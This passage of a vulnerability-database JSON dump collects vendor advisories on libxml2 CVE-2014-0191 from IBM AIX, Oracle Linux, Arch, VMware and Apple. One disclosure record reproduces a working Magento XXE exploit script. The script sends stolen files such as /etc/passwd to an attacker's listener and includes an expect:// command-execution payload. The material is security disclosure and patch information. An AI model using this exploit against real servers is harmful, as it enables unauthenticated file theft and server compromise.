-d fix_name -X all # where fix_name is the name of the\n # fix package being installed.\n\n Interim fixes have had limited functional and regression\n testing but not the full regression testing that takes place\n for Service Packs; thus, IBM does not warrant the fully\n correct functionality of an interim fix.\n\n Interim fix management documentation can be found at:\n\n http://www14.software.ibm.com/webapp/set2/sas/f/aix.efixmgmt/home.html\n\n To preview an interim fix installation:\n\n emgr -e ipkg_name -p # where ipkg_name is the name of the\n # interim fix package being previewed.\n\n To install an interim fix package:\n\n emgr -e ipkg_name -X # where ipkg_name is the name of the\n # interim fix package being installed.\n\nV. WORKAROUNDS\n\n None\n\nVI. OBTAINING FIXES\n\n AIX security fixes can be downloaded from:\n\n ftp://aix.software.ibm.com/aix/efixes/security\n\n AIX fixes can be downloaded from:\n\n http://www.ibm.com/eserver/support/fixes/fixcentral/main/pseries/aix\n\n NOTE: Affected customers are urged to upgrade to the latest\n applicable Technology Level and Service Pack.\n\nVII. CONTACT INFORMATION\n\n If you would like to receive AIX Security Advisories via email,\n please visit \"My Notifications\":\n\n http://www.ibm.com/support/mynotifications\n \n To view previously issued advisories, please visit:\n \n http://www14.software.ibm.com/webapp/set2/subscriptions/onvdq\n\n Comments regarding the content of this announcement can be\n directed to:\n\n security-alert@austin.ibm.com\n\n\tTo obtain the OpenSSL public key that can be used to verify the\n signed advisories and ifixes:\n\n Download the key from our web page:\n\n http://www.ibm.com/systems/resources/systems_p_os_aix_security_pubkey.txt\n\n To request the PGP public key that can be used to communicate\n securely with the AIX Security Team you can either:\n\n A. Send an email with \"get key\" in the subject line to:\n\n security-alert@austin.ibm.com\n\n B. Download the key from a PGP Public Key Server. The key ID is:\n\n 0x28BFAA12\n\n Please contact your local IBM AIX support center for any\n assistance.\n\nVIII. ACKNOWLEDGMENTS\n\n IBM discovered and fixed this vulnerability as part of its\n commitment to secure the AIX operating system.\n\nIX. REFERENCES:\n\n Complete CVSS Guide: http://www.first.org/cvss/cvss-guide.html\n On-line Calculator V2: http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2\n X-Force Vulnerability Database: http://xforce.iss.net/xforce/xfdb/75510\n CVE-2014-0191: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0191\n\n *The CVSS Environment Score is customer environment specific and will\n ultimately impact the Overall CVSS Score. Customers can evaluate the\n impact of this vulnerability in their environments by accessing the links\n in the Reference section of this Flash.\n\n Note: According to the Forum of Incident Response and Security Teams\n (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry\n open standard designed to convey vulnerability severity and help to\n determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES\n \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF\n MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE\n RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY\n VULNERABILITY.\n", "edition": 16, "modified": "2014-08-22T08:17:41", "published": "2014-08-15T10:26:30", "id": "LIBXML2_ADVISORY.ASC", "href": "https://aix.software.ibm.com/aix/efixes/security/libxml2_advisory.asc", "title": "AIX libxml2 vulnerability,VIOS libxml2 vulnerability", "type": "aix", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:34:27", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191", "CVE-2014-3660"], "description": "[2.9.1-5.0.1.el7_1.2]\n- Update doc/redhat.gif in tarball\n- Add libxml2-oracle-enterprise.patch and update logos in tarball\n[2.9.1-5.2]\n- Fix missing entities after CVE-2014-3660 fix\n- CVE-2014-0191 Do not fetch external parameter entities (rhbz#1195649)\n- Fix regressions introduced by CVE-2014-0191 patch", "edition": 4, "modified": "2015-03-30T00:00:00", "published": "2015-03-30T00:00:00", "id": "ELSA-2015-0749", "href": "http://linux.oracle.com/errata/ELSA-2015-0749.html", "title": "libxml2 security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:39:06", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191", "CVE-2013-2877"], "description": "[2.7.6-14.0.1.el6_5.1]\n- Update doc/redhat.gif in tarball\n- Add libxml2-oracle-enterprise.patch and update logos in tarball\n[2-2.7.6-14.el6_5.1]\n- Improve handling of xmlStopParser(CVE-2013-2877)\n- Do not fetch external parameter entities (CVE-2014-0191)", "edition": 4, "modified": "2014-05-19T00:00:00", "published": "2014-05-19T00:00:00", "id": "ELSA-2014-0513", "href": "http://linux.oracle.com/errata/ELSA-2014-0513.html", "title": "libxml2 security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:34:08", "bulletinFamily": "unix", "cvelist": ["CVE-2015-7497", "CVE-2015-7941", "CVE-2014-0191", "CVE-2015-8317", "CVE-2015-7498", "CVE-2015-8241", "CVE-2015-5312", "CVE-2015-7500", "CVE-2015-8242", "CVE-2015-1819", "CVE-2015-7499", "CVE-2014-3660", "CVE-2015-7942"], "description": "[2.9.1-6.0.1.el7_1.2]\n- Update doc/redhat.gif in tarball\n- Add libxml2-oracle-enterprise.patch and update logos in tarball\n[2.9.1-6.2]\n- Fix a series of CVEs (rhbz#1286496)\n- CVE-2015-7941 Stop parsing on entities boundaries errors\n- CVE-2015-7941 Cleanup conditional section error handling\n- CVE-2015-8317 Fail parsing early on if encoding conversion failed\n- CVE-2015-7942 Another variation of overflow in Conditional sections\n- CVE-2015-7942 Fix an error in previous Conditional section patch\n- Fix parsing short unclosed comment uninitialized access\n- CVE-2015-7498 Avoid processing entities after encoding conversion failures\n- CVE-2015-7497 Avoid an heap buffer overflow in xmlDictComputeFastQKey\n- CVE-2015-5312 Another entity expansion issue\n- CVE-2015-7499 Add xmlHaltParser() to stop the parser\n- CVE-2015-7499 Detect incoherency on GROW\n- CVE-2015-7500 Fix memory access error due to incorrect entities boundaries\n- CVE-2015-8242 Buffer overead with HTML parser in push mode\n- CVE-2015-1819 Enforce the reader to run in constant memory\n[2.9.1-6]\n- Fix missing entities after CVE-2014-3660 fix\n- CVE-2014-0191 Do not fetch external parameter entities (rhbz#1195650)\n- Fix regressions introduced by CVE-2014-0191 patch\n[2.9.1-5.1]\n- CVE-2014-3660 denial of service via recursive entity expansion (rhbz#1149087)", "edition": 4, "modified": "2015-12-07T00:00:00", "published": "2015-12-07T00:00:00", "id": "ELSA-2015-2550", "href": "http://linux.oracle.com/errata/ELSA-2015-2550.html", "title": "libxml2 security update", "type": "oraclelinux", "cvss": {"score": 7.1, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:05:49", "description": "\neBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection", "edition": 1, "published": "2015-10-30T00:00:00", "title": "eBay Magento 1.9.2.1 - PHP FPM XML eXternal Entity Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0191", "CVE-2015-5161"], "modified": "2015-10-30T00:00:00", "id": "EXPLOITPACK:C06A4B2B66645C13B898B81F53653130", "href": "", "sourceData": "=============================================\n- Release date: 29.10.2015\n- Discovered by: Dawid Golunski\n- Severity: High/Critical\n- eBay Magento ref.: APPSEC-1045\n=============================================\n\n \nI. VULNERABILITY\n-------------------------\n\neBay Magento CE <= 1.9.2.1 XML eXternal Entity Injection (XXE) on PHP FPM\neBay Magento EE <= 1.14.2.1 \n\n \nII. BACKGROUND\n-------------------------\n\n- eBay Magento eCommerce\n\nhttp://magento.com/\n\n\"More than 240,000 merchants worldwide put their trust in our eCommerce \nsoftware. Magento's eCommerce platform gives you the tools you need to attract \nmore prospects, sell more products, and make more money. It's what we do.\n\nWe're owned by eBay, so you know we're eCommerce experts\"\n\n\n- PHP FPM\n\nhttp://php.net/manual/en/install.fpm.php\n\n\"FPM (FastCGI Process Manager) is an alternative PHP FastCGI implementation with\n some additional features (mostly) useful for heavy-loaded sites.\"\n\nStarting from release 5.3.3 in early 2010, PHP merged the php-fpm fastCGI \nprocess manager into its codebase. \n\n \nIII. INTRODUCTION\n-------------------------\n\neBay Magento eCommerce application uses Zend Framework which has a \nvulnerability that allows for XML eXternal Entity injection in applications\nserved with PHP FPM.\n\nXXE (XML eXternal Entity) attack is an attack on an application that parses XML \ninput from untrusted sources using incorrectly configured XML parser. \nThe application may be forced to open arbitrary files and/or network resources.\nExploiting XXE issues on PHP applications may also lead to denial of service or\nin some cases (e.g. when an 'expect' PHP module is installed) lead to command \nexecution.\n\n\nIV. DESCRIPTION\n-------------------------\n \nThe aforementioned XXE vulnerability in Zend Framework which affects eBay \nMagento, was assigned a CVE-ID of CVE-2015-5161 and can be found in a \nseparate advisory at:\n\nhttp://legalhackers.com/advisories/zend-framework-XXE-vuln.txt\n\nIn short, the Zend Framework XXE vulnerability stems from an insufficient \nsanitisation of untrusted XML data on systems that use PHP-FPM to serve PHP \napplications. \nBy using certain multibyte encodings within XML, it is possible to bypass \nthe sanitisation and perform certain XXE attacks.\n\nSince eBay Magento is based on Zend Framework and uses several of its XML\nclasses, it also inherits this XXE vulnerability.\n\nThe vulnerability in Zend affects all its XML components, however there \nare two vulnerable Zend Framework vulnerable components:\n\n - Zend_XmlRpc_Server \n - Zend_SOAP_Server \n\nthat are of special interest to attackers as they could be exploited remotely \nwithout any authentication. \n\nMagento implements a store API providing XML/SOAP web services. \nAlthough the Zend_XmlRpc is present within Magento code base, the testing \nrevealed that an older Zend class was used for its implementation, which is\nnot vulnerable.\n\nHowever, further testing revealed that Magento SOAP API was implemented using\nthe Zend_SOAP_Server class from Zend Framework, which is vulnerable to the \nXXE injection vulnerability discovered earlier.\n\n \nV. PROOF OF CONCEPT\n-------------------------\n \nNormally, when an XML containing entities is supplied to magento SOAP API, the\nfollowing message gets produced:\n\n<SOAP-ENV:Body><SOAP-ENV:Fault><faultcode>Sender</faultcode>\n<faultstring>Detected use of ENTITY in XML, disabled to prevent XXE/XEE \nattacks</faultstring></SOAP-ENV:Fault></SOAP-ENV:Body></SOAP-ENV:Envelope> \n\nBelow is a POC exploit that automates the steps necessary to bypass this\nprotection on Magento served with PHP-FPM, and remotely exploit the XXE issue \nin Magento's SOAP API without authentication.\nAuthentication is not required for the exploitation, as Magento first needs to\nload the malicious XML data in order to read credentials within the SOAP \nlogin method. Loading malicious XML may be enough to trigger attacker's payload\nwithin the entities (in case of libxml2 library auto-expanding entities).\n\n\n---[ magento-soap-exploit.sh ]---\n\n#!/bin/bash\n#\n# POC Exploit (v1.1)\n#\n# eBay Magento CE <= 1.9.2.1 XML eXternal Entity Injection (XXE) on PHP-FPM\n# eBay Magento EE <= 1.14.2.1\n#\n# CVE-2015-5161\n#\n# Credits:\n#\n# Dawid Golunski\n# dawid (at) legalhackers.com\n# http://legalhackers.com\n#\n# Advisories:\n#\n# http://legalhackers.com/advisories/eBay-Magento-XXE-Injection-Vulnerability.txt\n# http://legalhackers.com/advisories/zend-framework-XXE-vuln.txt\n#\n# Usage:\n#\n# [Vulnerability test]\n#\n# This is to test the vulnerability with a simple XXE payload which retrieves the\n# /dev/random file and causes a time out. No receiver server is required in this\n# test as no data is returned.\n#\n# Run the script with just the URL to Magento SOAP API, with no other parameters. \n# E.g:\n# ./magento-soap-exploit.sh http://apache-phpfpm/magento/index.php/api/soap/index\n#\n#\n# [File retrieval from the remote server]\n# \n# ./magento-soap-exploit.sh MAGENTO_SOAP_API_URL FILE_PATH RECEIVER_HOST RECEIVER_PORT\n#\n# E.g:\n# ./magento-soap-exploit.sh http://apache-phpfpm/magento/index.php/api/soap/index /etc/hosts 192.168.10.5 80\n#\n# In this example, file extracted via the XXE attack will be sent as base64 encoded parameter to:\n# http://192.168.10.5:80/fetch.php?D=[base64_string]\n# You should have the receiver server/script listening on the specified port before running this exploit.\n#\n\nTIMEOUT=6\nPAYLOAD_TMP_FILE=\"/tmp/payload-utf16.xml\"\n\nif [ $# -ne 1 ] && [ $# -ne 4 ] ; then \n\techo -e \"\\nUsage: \\n\"\n\techo -e \"[Vulnerability test]\\n\"\n\techo -e \"$0 MAGENTO_SOAP_API_URL\"\n\techo -e \"E.g:\"\n\techo -e \"$0 http://fpmserver/magento/index.php/api/soap/index\\n\";\n\techo -e \"[File retrieval]\\n\"\n\techo -e \"$0 MAGENTO_SOAP_API_URL FILE_PATH RECEIVER_HOST RECEIVER_PORT\"\n\techo -e \"E.g:\"\n\techo -e \"$0 http://fpmserver/magento/index.php/api/soap/index /etc/hosts 192.168.5.6 80\\n\";\n\texit 2;\nelse \n\tTARGETURL=\"$1\"\nfi\nif [ $# -eq 4 ]; then \n\tFILE=\"$2\"\t\n\tRECEIVER_HOST=\"$3\"\n\tRECEIVER_PORT=\"$4\"\n\tTEST_ONLY=0\nelse\n\tTEST_ONLY=1\nfi \n\nif [ $TEST_ONLY -eq 1 ]; then \n\t# Vulnerability test \n\t# Perform only a test by reading /dev/random file\n\tTEST_PAYLOAD_XML='<?xml version=\"1.0\" encoding=\"UTF-16\"?>\n\t<!DOCTYPE foo [ \n\t<!ELEMENT PoC ANY >\n\t<!ENTITY % xxe SYSTEM \"file:///dev/random\" >\n\t\t%xxe;\n\t]>'\n\n\techo \"$TEST_PAYLOAD_XML\" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE\n\techo -e \"Target URL: $TARGETURL\\nInjecting Test XXE payload (/dev/random). Might take a few seconds.\\n\"\n\n\t# Fetching /dev/random should cause the remote script to block\n\t# on reading /dev/random until the script times out.\n\t# If there is no delay it means the remote script is not vulnerable or \n\t# /dev/random is not accessible.\n\tSTART=$(date +%s)\n\twget -t 1 -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE\n\tEND=$(date +%s)\n\tDIFF=$(expr $END \\- $START )\n\n\tif [ $DIFF -eq $TIMEOUT ]; then\n\t\techo \"Vulnerable. No response from Magento for $DIFF seconds :)\"\n\t\texit 0\n\telse \n\t\techo \"Not vulnerable, or there is no /dev/random on the remote server ;)\"\n\t\texit 1\n\tfi\nelse \n\t# File retrieval XXE payload\n\tSEND_DTD=\"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?>\n\t<!ENTITY % all \\\"<!ENTITY % send SYSTEM 'php://filter/read=/resource=http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php?D=%file;'>\\\">\n\t%all;\"\n\tSEND_DTD_B64=\"`echo \"$SEND_DTD\" | base64 -w0`\"\n\tFILE_PAYLOAD_XML=\"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-16\\\"?>\n\t<!DOCTYPE foo [ \n\t<!ENTITY % file SYSTEM \\\"php://filter/convert.base64-encode/resource=$FILE\\\">\n\t<!ENTITY % dtd SYSTEM \\\"data://text/plain;base64,$SEND_DTD_B64\\\">\n\t%dtd;\n\n\t%send;\n\t]>\"\n\n\t# Retrieve $FILE from the remote server and send it to $RECEIVER_HOST:$RECEIVER_PORT\n\techo \"$FILE_PAYLOAD_XML\" | iconv -f UTF-8 -t UTF-16 > $PAYLOAD_TMP_FILE\n\techo -e \"Target URL: $TARGETURL\\n\\nInjecting XXE payload to retrieve the $FILE file...\"\n\techo -e \"If successful, Base64 encoded result will be sent to http://$RECEIVER_HOST:$RECEIVER_PORT/fetch.php/D=[base64_result]\\n\"\n\techo -e \"If in doubt, try the vulnerability test option.\\n\"\n\twget -t 1 -v -T $TIMEOUT -O /dev/stdout $TARGETURL --post-file=$PAYLOAD_TMP_FILE\nfi\n\n\n--------------------------------\n\nThe above exploit uses the Out of band XXE payload which sends\nany retrieved data back to the attacker even though the attacker cannot\nsee the resulting file in the server's response directly. \nThis exploit also bypasses the LIBXML_NONET libxml setting imposed by the Zend \nFramework which prohibits network access. This is achieved through the usage of\nphp://filter wrapper which is treated as a local resource by the XML ENTITY \nhandler even though it references remote resources. \n\nSuccessful exploitation in a test mode ('Vulnerability test', exploit run \nwithout parameters other than the URL to Magento SOAP API) will result in a \ntime out and an internal server error caused by the XML ENTITY accessing \n/dev/random file which will block the API script. \n\nFor example:\n\n---\n\n$ ./magento-soap-exploit.sh http://vulnhost/magento/index.php/api/soap/index\nTarget URL: http://vulnhost/magento/index.php/api/soap/index\nInjecting Test XXE payload (/dev/random). Might take a few seconds.\n\n--2015-05-19 22:14:17-- http://vulnhost/magento/index.php/api/soap/index\nResolving precise (vulnhost)... 127.0.0.1\nConnecting to vulnhost (vulnhost)|127.0.0.1|:80... connected.\nHTTP request sent, awaiting response... Read error (Connection timed out) in \nheaders. Giving up.\n\nVulnerable. No response from Magento for 6 seconds :)\n\n---\n\n\nArbitrary file accessible to the PHP process can also be fetched with the \nabove exploit by using the following syntax:\n\n---\n\nattacker$ ./magento-soap-exploit.sh http://vulnhost/magento/index.php/api/soap/index /etc/passwd attackershost 9090\n\nTarget URL: http://vulnhost/magento/index.php/api/soap/index\nInjecting XXE payload to retrieve the /etc/passwd file... \n\nIf successful, Base64 encoded result will be sent to http://attackershost:9090/fetch.php/D=[base64_result]\nIf in doubt, try the vulnerability test option.\n\n--2015-05-19 22:33:06-- http://vulnhost/magento/index.php/api/soap/index\nResolving vulnhost (vulnhost)... 192.168.57.12\nConnecting to vulnhost (vulnhost)|192.168.57.12|:80... connected.\nHTTP request sent, awaiting response... Read error (Connection timed out) in \nheaders. Giving up.\n\n---\n\nThe result will be sent to attacker's server listening on port 9090 which\nneeds to be set up before running the exploit:\n\n---\n\nattacker# nc -vv -l 9090\n\nListening on [0.0.0.0] (family 0, port 9090)\nConnection from [192.168.57.12] port 9090 [tcp/*] accepted (family 2, sport 47227)\nGET /fetch.php?D=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovY[...cut...] HTTP/1.0\nHost: attackershost:9090\n\n\nattacker# echo 'cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaApkYWVtb246eDoxOjE6ZGFlbW9uOi91c3Ivc2JpbjovYmluL3NoCmJpbjp4OjI6MjpiaW46L2JpbjovYmluL3NoCnN5czp4OjM6MzpzeXM6L2RldjovYmluL3NoCnN5bmM6eDo0OjY1NTM0OnN5bmM6L2JpbjovY' | base64 -d\n\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/bin/sh\nbin:x:2:2:bin:/bin:/bin/sh\nsys:x:3:3:sys:/dev:/bin/sh\n[...]\n\n---\n\n\nIt may also be possible to execute arbitrary commands on the remote server\nif the remote PHP installation has the 'expect' module enabled.\nIn such case, an attacker could use expect:// wrapper within XML ENTITY\nto execute any command in the context of the PHP process.\nFor example, by adding the XML entity of:\n\n<ENTITY % file SYSTEM \"expect://id\">\n\nthe attacker could execute the /usr/bin/id command on the remote Magento host.\n\n\nVI. BUSINESS IMPACT\n-------------------------\n\nThis issue should be marked as high/critical due to the wide deployment of \neBay Magento software, low complexity of exploitation, as well as a possibility\nof an unauthenticated remote exploitation as demonstrated in this advisory. \nIf successful, an attacker could access sensitive files available to the\nweb server process, cause Denial Of Service, or even execute arbitrary commands\non the server with the permissions of the PHP/web process if certain PHP \nmodules are installed.\n\nThere is also a growing number of servers set up to serve PHP code with \nPHP-FPM, especially in web hosting environments which need to respond to heavy\nload.\nThere are official Magento tutorials explaining how to set up Magento with Nginx\nand PHP FPM for best performance:\n\nhttp://info.magento.com/rs/magentocommerce/images/\nMagentoECG-PoweringMagentowithNgnixandPHP-FPM.pdf\n \nVII. SYSTEMS AFFECTED\n-------------------------\n\nVersions of eBay Magento CE equal to 1.9.2.1, or older can be exploited on a\nweb server with PHP-FPM SAPI.\neBay Magento EE was not tested, but is also affected by this issue according\nto the vendor (see APPSEC-1045), up to version EE 1.14.2.1.\n\nTo be exploitable, the system must have a version of libxml library which \nexpands XML entities without additional libxml2 settings. This is true for \nolder versions, as well as newer versions of libxml2 with missing updates,\nsuch as a fairly recent patch for the issue of CVE-2014-0191. \nFor some distributions (see references below) libxml2 patches were released \nas late as April 2015, and for this reason, there are likely many systems \nwhich still lack the libml2 updates and allow to exploit the Magento/Zend \nvulnerability described in this advisory.\n\nThe exploit however does not depend on a PHP version installed. In fact, the\nexploit was confirmed to work on Fedora 21 with a new (a month's old) PHP \nversion of:\n\nPHP Version => 5.6.14\nBuild Date => Sep 30 2015 13:53:16\n\nThe issue can also be exploited on multiple web servers, as PHP-FPM can be set\nup on popular web servers such as Apache, or Nginx on Linux/Unix, as well as \nWindows systems (as per the 'fpm on cygwin' setup guides available on the \nInternet).\n\n \nVIII. SOLUTION\n-------------------------\n\neBay Magento was informed about the issue and assigned it a reference ID of\nAPPSEC-1045. eBay released a patch bundle titled:\n\n'SUPEE-6788 Patch Bundle'\n\nprior to the release of this advisory. \nTo address the vulnerability, the patch should be installed, or Magento should \nbe upgraded to the latest version of 1.9.2.2 which already contains the fix.\n \nIX. REFERENCES\n-------------------------\n\nhttp://legalhackers.com/advisories/eBay-Magento-XXE-Injection-Vulnerability.txt\n\nhttp://legalhackers.com/advisories/zend-framework-XXE-vuln.txt\n\nhttp://framework.zend.com/security/advisory/ZF2015-06\n\nPowering Magento with Ngnix and PHP-FPM:\nhttp://info.magento.com/rs/magentocommerce/images/MagentoECG-PoweringMagentowithNgnixandPHP-FPM.pdf\n\nhttp://www.securiteam.com/\n\nhttp://seclists.org/fulldisclosure/2015/Oct/105\n\nOfficial eBay Magento website:\nhttp://magento.com/\n\nPatch 'SUPEE-6788 Patch Bundle', addressing 'XXE/XEE Attack on Zend XML \nFunctionality Using Multibyte Payloads' (APPSEC-1045) is available at:\n\nhttp://merch.docs.magento.com/ce/user_guide/magento/patch-releases-2015.html\n\nCVE-2014-0191 :\nhttps://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0191\nhttps://bugzilla.redhat.com/show_bug.cgi?id=1090976\n\n\nX. DISCOVERED BY\n-------------------------\n\nThe vulnerability has been discovered by Dawid Golunski\ndawid (at) legalhackers (dot) com\nlegalhackers.com\n \nXI. REVISION HISTORY\n-------------------------\n\nOct 29th, 2015: Advisory released\n\nNov 3rd, 2015: Updated exploit to work on newer libxml2 versions such as \n 2.9.1 without CVE-2014-0191 patch, updated 'Systems affected' \n section, plus minor updates in other sections\n \nXII. LEGAL NOTICES\n-------------------------\n\nThe information contained within this advisory is supplied \"as-is\" with\nno warranties or guarantees of fitness of use or otherwise. I accept no\nresponsibility for any damage caused by the use or misuse of this information.", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "archlinux": [{"lastseen": "2016-09-02T18:44:42", "bulletinFamily": "unix", "cvelist": ["CVE-2014-0191", "CVE-2014-3660"], "description": "Daniel Berrange discovered that libxml2 incorrectly performs entity\nsubstitution in the doctype prolog, even if the application using\nlibxml2 disabled any entity substitution. A remote attacker could\nprovide a specially crafted XML file that, when processed, leads to the\nexhaustion of CPU and memory resources or file descriptors.", "modified": "2014-10-24T00:00:00", "published": "2014-10-24T00:00:00", "id": "ASA-201410-12", "href": "https://lists.archlinux.org/pipermail/arch-security/2014-October/000123.html", "type": "archlinux", "title": "libxml2: Denial of service", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "vmware": [{"lastseen": "2019-11-06T16:05:33", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3797", "CVE-2014-0191", "CVE-2013-4238", "CVE-2013-2877", "CVE-2014-0015", "CVE-2013-1752", "CVE-2014-8371", "CVE-2014-0138"], "description": "**a. VMware vCSA cross-site scripting vulnerability** \nVMware vCenter Server Appliance (vCSA) contains a vulnerability that may allow for Cross Site Scripting. Exploitation of this vulnerability in vCenter Server requires tricking a user to click on a malicious link or to open a malicious web page. \nVMware would like to thank Tanya Secker of Trustwave SpiderLabs for reporting this issue to us. \nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2014-3797 to this issue. \nColumn 4 of the following table lists the action required to remediate the vulnerability in each release, if a solution is available. \n\n", "edition": 4, "modified": "2015-01-27T00:00:00", "published": "2014-12-04T00:00:00", "id": "VMSA-2014-0012", "href": "https://www.vmware.com/security/advisories/VMSA-2014-0012.html", "title": "VMware vSphere product updates address security vulnerabilities", "type": "vmware", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "apple": [{"lastseen": "2020-12-24T20:44:16", "bulletinFamily": "software", "cvelist": ["CVE-2015-3733", "CVE-2015-3776", "CVE-2015-3736", "CVE-2015-3802", "CVE-2015-3797", "CVE-2014-0191", "CVE-2015-3744", "CVE-2015-3734", "CVE-2015-3731", "CVE-2015-3778", "CVE-2015-3752", "CVE-2015-3732", "CVE-2015-5776", "CVE-2015-3766", "CVE-2015-3798", "CVE-2015-3738", "CVE-2015-5777", "CVE-2015-3740", "CVE-2015-3782", "CVE-2015-3739", "CVE-2015-3784", "CVE-2015-3743", "CVE-2015-3768", "CVE-2015-3747", "CVE-2015-5781", "CVE-2015-5749", "CVE-2015-3805", "CVE-2015-5774", "CVE-2015-3730", "CVE-2015-3803", "CVE-2015-3750", "CVE-2015-3795", "CVE-2015-5761", "CVE-2015-3753", "CVE-2015-5773", "CVE-2015-3800", "CVE-2015-3807", "CVE-2015-5756", "CVE-2014-3660", "CVE-2015-3749", "CVE-2015-3742", "CVE-2012-6685", "CVE-2015-3748", "CVE-2015-5775", "CVE-2015-3759", "CVE-2015-3746", "CVE-2015-3793", "CVE-2015-5755", "CVE-2015-5758", "CVE-2015-3804", "CVE-2015-3741", "CVE-2015-3751", "CVE-2015-5782", "CVE-2015-5778", "CVE-2015-3745", "CVE-2015-3735", "CVE-2015-7995", "CVE-2015-5757", "CVE-2015-3796", "CVE-2015-3806", "CVE-2015-3737"], "description": "For the protection of our customers, Apple does not disclose, discuss, or confirm security issues until a full investigation has occurred and any necessary patches or releases are available. To learn more about Apple Product Security, see the [Apple Product Security](<https://www.apple.com/support/security/>) website.\n\nFor information about the Apple Product Security PGP Key, see [How to use the Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nWhere possible, [CVE IDs](<http://cve.mitre.org/about/>) are used to reference the vulnerabilities for further information.\n\nTo learn about other security updates, see [Apple security updates](<https://support.apple.com/kb/HT201222>).\n\n## Apple TV 7.2.1\n\n * **bootp**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A malicious Wi-Fi network may be able to determine networks a device has previously accessed\n\nDescription: Upon connecting to a Wi-Fi network, iOS may have broadcast MAC addresses of previously accessed networks via the DNAv4 protocol. This issue was addressed through disabling DNAv4 on unencrypted Wi-Fi networks.\n\nCVE-ID\n\nCVE-2015-3778 : Piers O'Hanlon of Oxford Internet Institute, University of Oxford (on the EPSRC Being There project)\n\n * **CloudKit**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A malicious application may be able to access the iCloud user record of a previously signed in user\n\nDescription: A state inconsistency existed in CloudKit when signing out users. This issue was addressed through improved state handling.\n\nCVE-ID\n\nCVE-2015-3782 : Deepkanwal Plaha of University of Toronto\n\n * **CFPreferences**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A malicious app may be able to read other apps' managed preferences\n\nDescription: An issue existed in the third-party app sandbox. This issue was addressed by improving the third-party sandbox profile.\n\nCVE-ID\n\nCVE-2015-3793 : Andreas Weinlein of the Appthority Mobility Threat Team\n\n * **Code Signing**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A malicious application may be able to execute unsigned code\n\nDescription: An issue existed that allowed unsigned code to be appended to signed code in a specially crafted executable file. This issue was addressed through improved code signature validation.\n\nCVE-ID\n\nCVE-2015-3806 : TaiG Jailbreak Team\n\n * **Code Signing**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A specially crafted executable file could allow unsigned, malicious code to execute\n\nDescription: An issue existed in the way multi-architecture executable files were evaluated that could have allowed unsigned code to be executed. This issue was addressed through improved validation of executable files.\n\nCVE-ID\n\nCVE-2015-3803 : TaiG Jailbreak Team\n\n * **Code Signing**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: A local user may be able to execute unsigned code\n\nDescription: A validation issue existed in the handling of Mach-O files. This was addressed by adding additional checks.\n\nCVE-ID\n\nCVE-2015-3802 : TaiG Jailbreak Team\n\nCVE-2015-3805 : TaiG Jailbreak Team\n\n * **CoreMedia Playback**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Viewing a maliciously crafted movie file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in CoreMedia Playback. This issue was addressed through improved memory handling.\n\nCVE-ID\n\nCVE-2015-5777 : Apple\n\nCVE-2015-5778 : Apple\n\n * **CoreText**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Processing a maliciously crafted font file may lead to an unexpected application termination or arbitrary code execution\n\nDescription: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation.\n\nCVE-ID\n\nCVE-2015-5755 : John Villamil (@day6reak), Yahoo Pentest Team \n\nCVE-2015-5761 : John Villamil (@day6reak), Yahoo Pentest Team\n\n * **DiskImages**\n\nAvailable for: Apple TV (3rd generation)\n\nImpact: Processing a maliciously crafted DMG file may lead to an unexpected application termination or arbitrary code execution with system privileges\n\nDescription: A memory corruption issue existed in parsing of malformed DMG images. This issue was addressed 